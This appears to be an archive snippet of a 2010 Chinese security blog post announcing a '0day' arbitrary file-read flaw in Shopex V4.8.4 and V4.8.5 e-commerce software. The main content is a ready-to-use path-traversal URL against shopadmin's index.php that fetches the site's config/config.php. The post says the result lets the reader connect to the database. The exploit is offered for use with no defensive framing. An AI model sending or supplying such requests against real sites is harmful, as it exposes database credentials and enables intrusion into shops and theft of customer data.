存档

文章标签 ‘Shopex’

Shopex V4.8.4 V4.8.5 0Day 通杀

2010年4月23日 没有评论 614 views

影响版本: Shopex V4.8.4 V4.8.5
漏洞描述: 文件过滤不严,导致任意文件读取漏洞。
测试代码:

http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

可以连上数据库.
阅读全文...

分类: 技术文章 标签: ,